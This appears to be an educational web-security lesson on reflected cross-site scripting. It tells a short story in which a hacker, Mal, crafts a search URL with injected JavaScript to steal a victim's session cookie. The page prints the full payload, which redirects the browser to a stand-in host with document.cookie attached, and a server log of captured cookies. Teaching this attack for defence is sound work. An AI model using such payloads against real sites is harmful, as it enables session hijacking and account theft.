Reflected XSS
Back to All Lessons
Mal is a hacker who has noticed that your site's search function passes search terms in the URL.
He knows the search terms in the URL will get displayed back on the search results page, and he wonders if they are escaped properly.
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
Sure enough, when he drops the URL in his browser, the injected JavaScript is executed and the browser redirects to his malicious site.
Mal can now checks his server log and hijack Vic's session, since the malicious redirect passed his session ID in the URL.
Mal cdb38ecff0dc0585f07a80c2b779bf872ccc7f66ad857f8e9bdd92a1bb433ce8
Let's look in my big book of hacks.
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
All your sessions are belong to us.
The indifferent restaurant review site
I guess you should search for food or something.
Server Logs
http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE
http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl
http://www.haxxed.com?cookie=SneklfjsdkleekflaAne
http://www.haxxed.com?cookie=asFFEfn222fefeknladf
Webpage HTML
<div class="search-terms">
  Search results for "<script>
    window.location="http://www.haxxed.com?cookie="+document.cookie
  </script>"
</div>

<h6>No results found</h6>
The indifferent restaurant review site

Search results for ""

Vic f6916d0b498dcca89157649e83a41798ebb95961e51494d19148f3bb8fc17e7d
This seems relevant to my interests.
Where's this taco then?
I am not having a good day.
Is your website vulnerable to XSS?
Netsparker n 834848961a0bf6ec5556448ff47f421d0b1204a572877a59717064b1088e8c43
Check today. Scan your website for Reflected XSS and other vulnerabilities with